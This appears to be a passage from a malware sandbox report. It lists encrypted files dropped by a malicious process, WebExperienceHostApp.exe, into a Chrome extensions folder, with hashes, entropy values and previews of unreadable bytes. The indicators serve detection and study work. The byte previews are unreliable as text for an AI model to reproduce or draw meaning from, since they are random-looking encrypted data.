SHA-256:	D687198F3020867A65A145C59C529A75C00D8DABBC77E1CD5F97A43CD04CC0D1
SHA-512:	6F91D5B8226F8EB575BE2A0D6054F1EFC82A96D33F39F2A5EC192AB01D6431B706F4DAEF19003CDA8D2E43C2BC185A33A72AB10F944C223BC380AC6FDAF84949
Malicious:	true
Preview:	..C.+]"1......s..U^.<,N6)...w....Q..Z~..A.6.G...Z.....Z.V...?...@U\.5w.....(..y...w.y.x..l....I1...G......S..=..\.{s...3A....:...S...et.....)...).G.x..@.t.h..."...v+....P^Z..c4%R....P..O....)<.+.~.@)b.1...c.....LL."C..'....nB...o.O2....2.G.-O>(^...j..F......\"e.$^y6o.D...d...X.......~d..l.B.......K.n....VC..8.M.Xd..T<T...X%.....-E.6..}>.R..+`.........J.]....7b.^..L.(...w..u.J..'&8.Uc.v}..[g..Zy)^..j.+..G.PY.S.$..T\[l.E.u.O...E.......te.x....r.....La....G..F..h..?.}......W..2..L.\+W..<.^4bm..E..W..+......}...E.....7./k..`....u..F..E..].(.3..<D..$....A.......wQ<...`wP.l..J...H9.......{....Ob}....).......f...6...["S....+..UNU1.6..".p.1.Q.\.X....~I.uK.........r...Q.T.........".....J.>.Y!..8.....dT""..D.%d....w_.=(s._.@....w.u.7....6...f..;...T......h5g.)!...r.c<.t.......B...]..0....t..4.]..o.cuH......X......Yx=P..,=.yF."(c..n...1!..qJ..K....:;"..3p.-N....].d..........nf!.u...C..G..7.iu...I..\.....K.i.q.....OW.....Y56;E.s7..6..1.Rg.......V.@....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.35

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	78862
Entropy (8bit):	7.997909594863668
Encrypted:	true
SSDEEP:	1536:DbRSOeN5aKCd6OCQMPsjWsUtxfKxunGrYN2LZH/8yI3P6ek4xhviUf:vAOeN5aKCIOfHjWsSSxuGUNW/03K4xhp
MD5:	848E786A4E27DE29734B05E8AE9F8F43
SHA1:	AB96918CBCFFE7AC2CB56B394B6C4335D615310B
SHA-256:	50E5697EDD5442A9C525183CA029F1AF0ACF5DA8ACE34EB94E1F249E931E0399
SHA-512:	D0BB25FA9F9622E263D74CCBA895B9942A5B795F941F7A566C27A7324964CFDB41D381BB86C67E2191942EA5434E666C556CFB4CF534652918A51290D5E19E78
Malicious:	true
Preview:	i..\|.W2#.....1...L.ut.....O.]..L5......L...y....N.Ci'...6.....f...%.Y{..F....]...-1.dwd.R..N..........0..ii.W_R..`..v=ML..e.....D...%Fn....zF}..N...z..].I..I."..`...s..[...F.._Z....O...lA`.3.\|...G..M.8.........`.R..7.tF.....u&K[&.[W.t..l..&..f.Hw.c.-..p.....{.d..Q7(...-_.....h....m..7.#.I.r9.mJ...,.Q..... q9..$.29g..(..F....pt:j......."<.r.j...+C.I..;.(..J\|....}...)!..Ir."q..Ia..G+x.kY..qQEl...yW@M..q....r.y..,.u.H....j#.C...8C.....M..}...R..JQ=bf..?..X.._.A.Eg.2@Q,..eM.....d....~.q...."0....#.."..q.T..,...0#...dR9F..wE..=o".wJ..n..9.....C.J.U..G-B8.....c....$....E.O=N......c.u]!..C+SS.}/..h.A....W.8I.....=..@;.....y.t.......!....I.F....'.IT-$..s.qe..tl.....`]T....f../L.Sk.;.U..`.}......b\|..}.X.h.R.^P..D}-..B2.L.......fV^...9..!9.x....bW..8..p.\...:.Fd53.&........z.....;!..Y9..`.}..In..4.$.H........u]...cx.a.........'.Qk}..f..3......9q..xT.^D....?.nEo..;.hD).jb5j.......]Yw+...!....T.t..&Z.s18.P@.c.....P..m\|G.9.s.6.C.f.VJ.9

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.36

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	70735
Entropy (8bit):	7.997547189908903
Encrypted:	true
SSDEEP:	1536:8IG9B9COoGYLSHsY+QOnHOWDtd1FAh7+Gh8nBkC8UPWtrE0/8IMD/gX:8b9B9Cx6sY+nnhDbvi7+GynKUP2E0/8A
MD5:	8111587F6EEF94E20D82D1D47A75D2C0
SHA1:	612AE912416FD2951C60F275B51E9659905F3631
SHA-256:	EABBBDF537AD123B3B958D49CC36F4ACEB7E107BA15A0BA249117678C9172D5B
SHA-512:	F1C14F9465E445D23CCA83B81EA454D6BD8DE0B0F63A148B3308EFA671776A769B5E6E20D59D94A93B632EF4EAD5AEF9A63DDA2FE4FD6F39D5E1C40E52024FC4
Malicious:	true
Preview:	v... .~..%...K/6.....j...c..f.!...;.!..zG...W....@...L#-..=i]r9.$.W."ZK2.,....5nnT......Yz...G.3....F=.v.4....:..T.....r....D....g:.U.9.k.._....N8....}..q..8.cX..&...3.V;....gx.k.$&}..<..T6...c.aO.).auJ..#B..... T..kv..+...7.&.Sby..[n..qS.[.]...Q.:.pn.\_o0..oX....8\|...z.o&......W4x.....M.E\|q.ey#w..P.jZ.2..y'.....m2..!.!..q(>^.@...6.Q...z... .o."..]J8_......u..7.....O.&.m.nEP5.....h.~...`.4.S..K. T../I&..Td.5.".M%.k.rl.'.C...e.H...D.E..gy...'.....}n..).'.LsP....V.r...0.\|...a..l2SC./}.?..J...^&F...\......M..9l...VG=....w.}e{. ...g..wu.=r.j..xh[.:U~\|m.4.[..Qt....%.}.^.g..Q.m........e}S..nz`;u...~0g.m..k.$..C...\|U..].'7.{...Y.~........3\...\|......WP.c.0...-E8..>'.#..>...t.....4....Wz&..3.N.[.o.;.../}.9...t7>CY...q.s~.a=D.Z1.R..Uc..]\. ...>@..Tk.i.I)P...............]..V.....CF x 1X.C...l}...1.t.M.".L.....{.e...`..i.zJr[.q...U....v....j5..~F\|.....3.:ND.F.,..d......~.+.w...a7.j..:./.. hb..k.[.7.b.f.({..o..mA%M?!..F..;.*P.S.pu..>...Qw}K...v9...I(.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.37

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	78877
Entropy (8bit):	7.997709985507824
Encrypted:	true
SSDEEP:	1536:iY4KGMa7JrAdhz3kb92cF7ASmDmF+dUc6o5FiVgSsTA1gHTucfLAjP1:iY4COlWhK2cF7Fzc6ClLAij0jP1
MD5:	9E6D44AF2442BC09A2022E324A1D0771
SHA1:	E83A1D96B00321391909D1BA40641CF37E969305
SHA-256:	6A5450B25E4079698FD7B79530D97B9C07B92648B89AC3EBC5A4C4BA5A746469
SHA-512:	6B40FD41D4661C57D95D7E715817F549E2F3C3636089BCBDD70D95C1D05FF121E00889FBEC8E3977B4B7EC3FF3DB51BF5B56B5F87A75425C33A8F08502961010
Malicious:	true
Preview:	......p...;...I.Q.+m.U..qG.......p..u..-%..qhy%..l.....(..~..>.N.../..:.s..\.WV.<..v9.....y.0..7.../..........)....>YeS0...a=....3......H...........y.dFa-..x....-..r.[.H..........V.VX..E..$.......Y).)^A...BR'....R.M..............iZ...,. ^+....._..C..P.mT.\|...~^..v.n.8d.q..uY...{..FF..O.vC+.......8(.......D..%.......np<...s[....Q.&.;.u.PX.+.a..Rv..E..(.T......c...$...u ..hw:.1v.R....p~..R...f#E..Q.......c.w...+.VB.]hC.\|A....U..I.E..`...jX.H7.$....<(NX..s."#9.S.zc.....v.g..}....Q&M9...U....R.p1..fw....4d....R_.x\|.{..O....L9.l7........Di@.z.}..^........XY...`l9q..UI..:.pT.....q..@..3....T8.N.J...D..r....iT..xf.k.s.8.6...r...G.dq.R...[pg.J.p^......)..y7v{...f...Wo.?./...A..]..O../.....,...5.4>......Nj...b.G..B*.... i.}.....{4....@G.n.T..zk.S.).9....$....=.... ....@%........xG.m...J......k.....zv.\|....k..=.4..v..L5<zT....\.'..;..R.I....n&.......X`...2}.i...P)......j...>...O...^...Z,..!R.GSd....bM.5\..fL`..7.........[xl..I;..f..u1..b%.\\|Os....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.38

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	61544
Entropy (8bit):	7.997153408462792
Encrypted:	true
SSDEEP:	1536:HvZHrrQ8N31kOajJXni8rr9QMd8acnTQO2B+eFcD2UbXnGy1W2k:NsWkOajs8neMd8vQl0bXnX8H
MD5:	3650FB76AE4CFF4726E8872B93E2C12C
SHA1:	A3A65CC647B6AACE541A8EE594A448630970C8DA
SHA-256:	206071ECD6E7E8EE9D1EF4AD076A7CC494EA9B3ADD7A19F7722AF5552FCBB8C6
SHA-512:	9FB164BC611053DEA149D80AC650540440B7BC96E089B097CC01E9CA4F5A63C28D7D795A1305BB0CDBFA3720C446FA4F2B8AAB5296D2B1A14CD9FC8B9F3DDD42
Malicious:	true
Preview:	.\sX.].i.<.w..s..m"O$=.]......!...~..T-8..0.%..I....&........R<.........h@u..+8..?..W..Z(.zx=X...j\(.pn.0..M._x...M`.g..JN.d)..p......fn......+...9-P.....5.6C9....e....6....$.......P.z....r..E...W4....+.N;....f......._f..r\|l1;.+.%..".s.....H..N.\|.a..&.4=......V.I...`ZP.Se.....(..z......z ...t..~;.>Y...X..J....Lo;..^..t../[q.P....Q7....~....Z..1.k../....T.....lt.A=$@.@#D...z[.....9.y..h........I....#.....M@..x..1..y+f...47^......\|7.D...G..b.A1<.c3Q+l.no5_1}q._.!...H...o.(....:.:P.V..s.W.Md\.B.j...?....9..`=.......j9/.....D.G]..^5.,.......P&..iQS_\|.v..1}.:H.ry......3.........+.....h.Y..../..t~..m..!.`}.........@.F... ......L..M.z.?.z...mld.&......+7...u..cB...I@R...... .Q..!..Yd=..R.[.C..H...<..,...d..).1..O...^..]+.H.:u.(..7.z....N.l.X....b......%..#X[9.^....{..[.....,.....8.......v.u.FuT...D)c...W.s..d........Ri\|O.....)[K..........H?.....p/r.w.@..H.K.8.h.........v.........(.Y....L...vo.{........@...=6.)..].R......tr.........Z

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.39

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	70903
Entropy (8bit):	7.997762273448134
Encrypted:	true
SSDEEP:	1536:FoW7zuh08nXqwxjbFHE/R8BxRKYTp1+pK5K:qySh0yXqqRku3RmK5K
MD5:	3ADA0033CB145EA5F21FA500D7C0892E
SHA1:	4F708D1E86AD0E17724120C2173E63CA116E0F08
SHA-256:	837B9E02155A6E0050D32A7CFEA718A0EFAC9BE1438AE27963EED22FB73020C5
SHA-512:	72739AD51B300C0C79464211A967168291CA802A46697C64EC87DC2A4955935D9D513CFC6A2D2C861FE09A761D14282E05746639A777A7682ED5552167B9222E
Malicious:	true
Preview:	..X......8....y.!.j......h...m..u......;K.<..<P...+..F..`....pt.q.JP}....j.:. ......E7.!...{.W;W.T.:'.;....c.]U[J.&..b...n5.E..g....1....0.....+...n.,..l..4...r].>.uWR....T.,............v.m.GB.+hY0&tEHG.w.....+++z.8.....m+B#.pk.U..."..$..3.1. .......4....8,.>.$OJ>....'DoL......v..>..w...j..o1..d. ;.8.m..;k.5...J.qLH...5.)...DF).....~......r..}G..5%..........q9...@,..\|..m.t1.p...`cu..#t.#.x.XE.N&..aF..X.....?...@.G.t.....<.n>1.*X.KA.....-...).y..r+...D.G...U.1...C.I..[.[.Q..[.O.,.M.3.....:.....K;>.?..s.~......O.S.v..?c...ef....,....@........r.M...:.0....b.ut....P.4j..&.D..dg}..Bb.&..tA..ip.:.VM6~..`'\.#....O.U.nm...p...c[h.).6..g.i............[...T..J\|.D...f.....$....."wrd...C.mB....#\|.l..B.Z..-pU..2C...#.1P.K..yOC..ms{^.m0..`x..W.....r..\|.g..;........M\|}O../[...H~jT..M0Mpc.LY.N.].....0.....Q..2..#6./........I=.0C..h...]....<.+...W.CB.....X.........^...\|........V....."..xd.......s.>K.{.........U...by.O.W;...2Z....w2....'..\9.`...].4..y.....0.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.4

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	22448
Entropy (8bit):	7.990462302661758
Encrypted:	true
SSDEEP:	384:Ioyf2fiZMsYRaMYfHXMMqASpqDHUY8XXOh9hN5cHW9YsJVS4LZg7KcTz:Ioyf2fidfHXMM5FD0Y4929zVSSZfc/
MD5:	9FEDAB7983A94C2172ED0C8AD31A4AE0
SHA1:	2344A10B0AC579D5F7C85B2F123568195CAA1129
SHA-256:	03C0316AA06175D01772C590729B5861CCAA1E534C50A04C7749FB537FFB96F2
SHA-512:	3EA7075DB556F51622029F655E13869A1E54619F1D5435C1A55A7EEE0E83EDA826A455026B1D138281697C27B02637CE2FD67F0B2E313ADEDDAD533B9DACA5D6
Malicious:	true
Preview:	.....$,.d........a_...Z..j(...mq.D+ ..h..\| ...a....v.......<...Y....7.T...R...?t..iaP.z\|^o....sL..=.Q..j.....rC..$-.l.x..<+..R"....>W.}.....p........u..h}.$..f#..Hs....E..../.#`H.\.....T.J.h......t.5qg.8{.c..-.....\......}M.....R..m...V6e...D.T...?0/..n._.2......p3......c...\|.5.G...ZV ...?.ZT7.......w.k2.>.T`._...'7......G.3$....q......0..bnn.u'..rb...!...V........&..Jy.W.F9.j9.............\..k).s...o.......(S...L.K.]..XY..'........D....J./..o.eX..@..q#..2a....1.1.....K.....n/...8hYj...<..)...2o.s,3{.[...`$P.....b....Ar.....5......{.og=....$....q..<...#.K'2.\..r....W.^.F.zS-."."..S..TPO+.s4.....W...1u...E..]...#..R.,J...0.....\|...SUE-}?m._../.r...H....I0...."0._n....{....!#..Q-.t...\|..#.iv...@.-...........X.g.Y".x...J.-...b~.S....4f...`...t.2.5P.....)V..q..]0H.G`;.M.....7F...i..`...7.W$=...$.]wT.jx..~5.....?....f.O8.W....V.........1.C.3w,...t.K.y......Y......s....l....o. g...Z.eX.R...m.D...z.......Trj`.mZ...(...+i..g.v..,...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.40

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31659
Entropy (8bit):	7.99399133173195
Encrypted:	true
SSDEEP:	768:SAbxvE64by57PDhD86oYVMkPRDUGkMYoAMp+V/zJ:SAbxvEjiHtdoYzRDUGkgAMUV
MD5:	5993A66FEC20A7F56E0F96BA6D4E1C3B
SHA1:	272995381A0540C694D74CB8EBAE95409D69884C
SHA-256:	8E16FDEB09B4ECC90704391DF62ED848A7B50395DD566F1B52C8EFDE7CDA8398
SHA-512:	E9868C86C679E38AA938CDB9EE2E9FF336F7FAF8FF6EEFD0FB1590EEA27C8D60C575BD2575992570C811E8E1D1201F44DDE6D0BD2D02952BA7EBBEF0AE4648FD
Malicious:	true
Preview:	.......D.8ou..=@f..h..3..).}.L.gq....N.....o.`]v.r1.RV..M..-P.B.5....CV.../....-....i.6..s.f0...........l"v>J...[....E.A...uC..Os............6.>......o92.u........n.l.-5..8..IO.}.<.><1....7..c...:..m.V?E?Kkkl..`@.G.=E.....t..K.$...Rc...c....:..w~...:.Yf.l..?Y....B.....D..s..\|.n....b.......@4.1."./.).......D...:..&.w...>n...=v....G..^(.\Xa.u.i.x../1....0p........c./T._h..,.@%.&....M..z..D.....c....1..bL.A?%[..o..z^o..R..p..G.A3V..\|f.5.....G..WXa...h_I...^......... ...N}X9v..HX.!w.~...r..?...\+..Qz2O,.t.H.h.9B.oF..(....?...jt.....-.c.,..a4....;.k..K..+S..Q..uD1....}w.l.............7..%..RY.~N.....1.<..s..%c.8._u.u]1#'.G.-.... ..#.....H.n=;/.q.... +.?8E),1"C....B...../.r.VX......E.3.]e;.y.Z%w.I.m......Z7YV.l..@'.6.c8S.f.T...s......h...M."......W...-..,\|<i...W.(...L.t<.G..&-.....h..a........&Ar....r....O....%T....`.b[J..,$...U.<...^QYSd......+.d..P...^.....M1.F....,....U..;..(e.C.`...m.......c..i..F-.^f.x.s.q.....4..l..b.5..(...W.u(tu

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.41

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	64474
Entropy (8bit):	7.997138619206409
Encrypted:	true
SSDEEP:	1536:DVV4ccfHGh0qSMA2PHDOK5iP8LDU8czc6k7fo:DD4cJH5iE88c9kLo
MD5:	DDF2883051F47CE475DAE1AFB23F7ABF
SHA1:	476243F58CA6B87B3282455801ACA0259AC6C723
SHA-256:	D7D2F9ACBAE11A604CD22795D5E8337512CB32577A86BA2917B8AB6388F0E052
SHA-512:	BBBB7B15EDAF56059A757020F71A3939911F049AD516D9D70E37F2EEA961D6E2267B15EA87DC87C12F45ECBCE6F01DA5BD639C3ADB4B38A0A1656227D4325574
Malicious:	true
Preview:	..gD..3.............o.E.....m..r!./#........YR..;7...im..zeN...1.C...B...\.b.......{..%'.!.g..(EL..6..tewH@..{.b"...~..y..........+C..'h.>6..S..."w....#.E_?..Z..S{...X....g..8\|..r..U.$..yy.......=.Z5..q....C'l...ub.=\d....;....x....i..~..Kgu.-.T..gs.m...$..#."0...j....N..j...Y..@.(o..I.>...8E./.y.Bs:-.mA....?......}....96..6.Y.._...K.Yl............h.O.i.V.k.Xh...I..L.......=I..qB..Wo.x....O..........t1.K,....n.?G.:......(.._.....+M...`.. .n.......p}...X...<.....G......nK}....TR...l..C.P...M...n.[4.T"...............Gt.....!M....W5Z.k.......\.7..%AX.8./S.&....>.>.2.......yw.&...B.+.$.....)..?.E#....Ay2....v.j.:.y.T...5.....[.i..G1.....N.."....V..`k@.'(L...V..B.!.RF..O%\E....... #B.....5..h..j....j.G.Ak.k.G..@.1>........>[.:.b'..........t\.u.. .....R.L.....X..!......%...%.R..DN....4.....E.9....5....Fw.$.$;.."s$?.T...C=...:.sLv.>1.....(tUR...>.8........%.4b.U.....x.X.}.^.l$....A. .n9n..Dy...... ...b.8z.....jO...X.1...I...;..ek....2.IU<*8.w...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.42

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	51995
Entropy (8bit):	7.996670553920514
Encrypted:	true
SSDEEP:	768:SB6bvf3r/Vj8XCYh+6mVu53kdL0IOV7+izG725zUc/VEcbddzACmfKG5Fdt28/b4:SEbvj6XC2RkdLEVvG72Z95Jx1oRt28z4
MD5:	D9C58337948C75B813FD2D5E82A97AA4
SHA1:	49F09C4ABA76893A1768FEA3C2A8D1B9824FB363
SHA-256:	77CF46704A7FDA09D1E918E48D3D53EB6AE7FDFBA930888393D89FB3A828B129
SHA-512:	0C954FC759A9A1D4EF86B02533378359640888DDBEE6A0A35F1E9E120CF9BB62E5DE18E876E7F9353FE140727472599BD5B89D29CD86DF8041E1F48B87EB6152
Malicious:	true
Preview:	.S.`...Z.2.A1l....\|.....QOr?......J.......1r...['.@..tI.U'(...$...y...CJ...9_.Q3k.......-./eV.d.g..\y....d.da~U-[.w)3...l...S....Sv......QU....8.a...#..^V..b..}....$D......U.p..F..^.....%..EO.....~..m'.W.{aj....' .5.C........O.G.0,."2...m.tR.)....W...#.....c.SX..v...tb.....#.q......-.....u.........tX1H@.Ee.vX.......e....O.4<..?{>.t.9.....\.......M..h...........r.....v.z_..9G.= ..'%...3/6..4.....Ts>M...\...........h...W_........A...y...4......K..bK..../......O......^sf]....]..:.{.;..q...M..;F,...]w.,....'...\..........>_n.4.....U09 \R.............@...T...'.j....x5....3gCa.......+.].az.cWW....{ =.i+.@..FTu...{....y.a'c={..<.s...2...q..lKu`7.j...Q....+.%.J...._=....\|]....-.,.*y>>.'.'..\|.'.6w.C.U.z....V.j...,Sj.7!?6.y.S.i.9..O..i...8....LS...=U=....gf.....5.4.K!....8f.i.2.Aq...R..M...h....\|..o......5..S......2..f...^._.. ..w...Y.T..u...\|0o.~.......T\|J'...^.9f ...8..<...!v.y.S.....TR0l.`..q...JV...3.....]......dFF]q.Z.~.#x...=..@k...2

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.43

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	31415
Entropy (8bit):	7.994143485365186
Encrypted:	true
SSDEEP:	384:3aVW6crT4edytR/uxt3YT/hGkSAakRI/CzGGra+/8xgXBTCR+3tG6uVztEwzi6SL:3jAtR/sOaRISiAkBeR+SV5mfWuGZiBl9
MD5:	0A2118A4283B99B879E8F73A8694F099
SHA1:	A0E8FB80D27F1BF1B4C2873A3FC54523087696BF
SHA-256:	D7C32146124A7A47F00FDED62330CC22DC444282A3EBAF3CF2D2D9E0878DB6AF
SHA-512:	DFF1A29AB778540DA045280F6071C033D2CA48AE807084980A619CC369CC749C9323A8AC661BFCBE23E4C3F0ACF2F4CF29A57F816345AB398DA256C4465180CE
Malicious:	true
Preview:	a.c.>....2.GH....;_...=XL.._..Ys.....+z......._+q.../k...6.9...d.FL.e.a..<.p.%......8..../-.M.(.....Z....S.w..NJ.z.UV.@S...;.J...,..3\|......JCwk.....{.....V>N....z.I....n.H..&.L......(...gH.$.H..............>......z..E....j}.....g...`s..U..H...Jh..3...H.......A_..Rf.h_zf...;v.....29i(.W}.......\|......{...TTWb.....:..[..v:A./b~.Z6....)....=...+..A...&.'....l9K<......9S+._.9.....+?]....b1./N.2.....U.yg.\.X.R.{R}.7H.....\.......Eg.zN.d..rR..[.h,..S..2..,.K.<.J.(P%n..X..H.+VA/>M.@X..V.n.3..k....H%...&.h..U=.Fro9D.....I.z. >..F....^.A..C....3b.k.5.u......A.L...A....?2.iT.8\|.Y...>...6..~.J`.O5`T...s......B...v4......./A.........h.o.s.M~[.].,L..$*...e$}...e.$..{b~.%xx..ex....\|...t..a.f........e.h.....Zl.....;..e..6Fd..(..a.._Ku.A....z##V..~.-.pn......P..?.....O................U..j:PC.o...dZ.....hp^..4"y..M1..B..-N.vs..p...V.'{;(.\..vL3..h.....\;....Y......WC.._..s...S..$..+..'..k..r.8w......4).<k.;vX.........B..u.......MeH'.....6\S.L..;{.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.44

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	99465
Entropy (8bit):	7.997818312765196
Encrypted:	true
SSDEEP:	3072:HP8joB8XiAYDPBF36R/9QQH/JtitZP+Cq4h1tRk:qiAYzBF36JlfJtidq2O
MD5:	095AE6EA21AE2A12BCD1A2359C3D78F1
SHA1:	143DA0B8E4BDB4377381A141FE4720FDE7D81B3B
SHA-256:	FC38B2DC72B0EE8181827210581CC4A560AE4A984CAFB91910EE80658841B0E0
SHA-512:	8C033C5D637EF289DBF28CFAC97DB9961ABEA6469054BC0A2864DE4FFC68765C801ED678CB3A955FD6313AA185FC98FB52BF41D62B10605B2EE2079130467DD2
Malicious:	true
Preview:	.6. ?.!...........a_;.[.,.dc.......j...xc..}...(.....5..b...F.v.He..]...".>;.'...N'R...x..L.T..QTr..G.Z....~.%M.....`...t.......E......u....QR.l...mU.H.z..p.a.j]uH.z...o.D...k=...$J.i....O.1..x..n:4RFiqg..q........P.Q...N...k.<.......K.....v......N.h8.@I....#{.r..Y.'..v..[..u...G..v!.....Ss/...;.zj..p...k..y...>...~.2.W...bT.#.......;.ao8L........?..-........r-.=....J..`..^\|..o.R..=.m.5.j...D..>'.a...W....$+m...P..`.^....U.d.....UP.\S\| ..IV..u..Gl.eUz.q.....I.zT$.i.\&...r...?.F.jp.x.T9%%4pG#...c...3?y..rD...w........:5..2...Q.u+...N...'ad."..!.85../...N..:.u...i@oI.Y..>.."j"G.YZ.^...g.$.....V%y.^...{......i...... ..l(......T+.~b.v..+.S.4.Ia.~.....e.c2`.......#........G.....6.5.SF.....p:...z3\&....^....O;.VN.Kf.......m....t.![S^.......&...I.....1.L..E..\o.$.Q...:...>.o.........dG..gb,2.........9..Wbk.}z.7.......T=...Q...B..4...uE.4@eN.../..B.....:....M_......uAFn..b. S.".+.....]..>X<.{.R.@...i..it..K.`..T1..,..%j.\..K...w..`. J...b.g......U.3.<2..V.Y.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.45

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32176
Entropy (8bit):	7.9940586558098286
Encrypted:	true
SSDEEP:	768:7+HfVBVBOdmCIjLCwFT5pASdUSD1u/shaNOwPgMaaAP5hjMkXdRo:q//OdpIXCwF9WSaSDA0hg4qA3RdC
MD5:	6118044F9E275C917582D65947E8DE41
SHA1:	6C9C21D007F856100C8B81D7ABA6AE2B48C85DFB
SHA-256:	E5890EB60C87A566000D78B637DF2812C3169B9E1A8711450A4FBA6A7062299C
SHA-512:	709FE85D777CD5E8172C63632D19E033739DE1380AAD8FB3151300CA5E0450D8BA5A5DA899D7AD6622DBBBDB9BEAD0AC850275A2F833C98CE24429AED2FD2331
Malicious:	true
Preview:	wr.MK.U.}.[....=q.....^..f...[..hVc......v...t=U?DQ..3.8k..g9.D.F1.w..i..2.L...d..8)...F...5.......&;...9.l.....9...s.X7..{h/.U...\...&.....O...Th.t....N..(.....8i,z.kdS..>.G....1.q...kV....#.....nY. J..S.}`..gb.i..w.U./ .W.x..\|...(..._{...LdS+y;.....o>..`.....Q\|3.UD..:F.9.yG"_...N/~.?.......k.16.j.q..6..C9..rD.lA..=.\|t.0b..i9'...q..nE.na.S..b...3^DAS..+....<..Y2.........c+.#,....b..q?.6m.\.h}C.'..c....U.._B.^-I...9a...+.&..~..../.@.S..X...@.!.B~.JL.a.;..ev3(.....p..s$...W......pxj.....~.4..,.x..e..!... ..z..$X...SL..O8x.?.x..#A...S.....f{u............)-..Q....,.F..H_p.......K....9.....~Wy.I.H.D.e.rr.p....X.\|.z+.(...{.P..A.=......j_l..Zj...'/.....5.5f......e..}....im.X(.,.:.t..M..b.ZW..K...o..P........&..3....yHf.CS.j..8..J<g..@m[XYo......[.o..hJ"...w5..:...X.[...;.p*.B_....8...U.{..,F..>..rs..LsV.lk.gOE...M.?@@..C...&..k....]8.....g...1r_.&.....B......l.t..R.=.....5.G....[...M._.\d.......$.T$..)..q.G.I...6S......HX....P....Z.F=..i."

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.46

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	91594
Entropy (8bit):	7.997720136221587
Encrypted:	true
SSDEEP:	1536:f9waA66hrRRXi6BMhXBQHKmlAwFkBNHx2Vb8j9od+DawyYVVyrx8xLYL:feVlXiqKAbF+B1Mb8jWd+NyOkVL
MD5:	0782126BBC13E20E6B8E8F32D932329D
SHA1:	393DE5EB74893A30FA81D417B1B70A9A639B86C9
SHA-256:	D3ADBCB5CC190C7E0C592F8568EE47442D84301E6F6A707E2D133D147C5F8546
SHA-512:	8CE5ED361DAD8C8FFFADE4E5490471AFBE2BB4359E137B7396FFC7E8633FAB4E05709A804BDAD9C6E1B120EB079DEFB0C1C4C44859FC28F36BE3AECE007BED21
Malicious:	true
Preview:	.'.K#tx...T..,...i.1..n..o.U.I.TNZFV.y.....?y...>q.....B1.?.".....w..f[.Q.O.....MO....A..x<q....0!..0...(....\|4.:.f.......b..d.g....}.q..?+..@sk_.....k~x...6....ml.1\|..........,.~}5..Gt.G.....L....{O..O.){.n..q&?Q.....9._c............xY}-......i..x4...8.i].l.....f..l...Q_.Z...$.Q...z...,cV..~/..t-...q.....G..&......I...~Kh}6M3Xf..#...V{W.(Hm....D.....a..>.......!.LJ9...N..-?pKJ B?..k5#....s(....0.J.!.....p...'.'.G.r",..7.....$.A....L....#NI.1ft.P.^.h...'L.....$Tz...'.._..o..].`..Y....0^@..(.....Q..H....g.n.xk..F]..(...0...Iv&...M.b..E........XD....,vI.....9F..........6..S....:.s.\Y$.N.l....0...]...^.B.0.K.l.m....'..<.Y.......+m^i.).&c..{..g..;.J.v...2..3%.YH...-..A.'..U..R....(.......Yh....K.....$....cUzX....d?...@C...g...4.O[....2w..s....(..4...![;... j..]y..S....]H;..V=.&../. .G.E..t...`N.Ld.=.am,..[.`9.M.?Q...54.4..80z.8x..[.I..p.W...]`0...d.}UEW..TU...E.E..+.m*.....`....+..I8.u..;..:.s[..E.}.p.p..(.5<!<..Gs.W.7.cU...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.47

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90749
Entropy (8bit):	7.997795978977805
Encrypted:	true
SSDEEP:	1536:1rAtLGb8lc6Pzleb+2+vrai4ZGflYFc+eCDlT7SmnRrTEW4hYTO2laXjYqa8ixUl:ZAYbslPUKBvjFflYmBelCQlf4hN1TBMK
MD5:	DD3E861F95F80AFFA6238F8BA390E73F
SHA1:	ACB5E89E2BDD7F55D40BA521027D801D3840C363
SHA-256:	822635A3922E60D4FE7B361F602CBFD668D8CEE9447A0E47541A0789622153AB
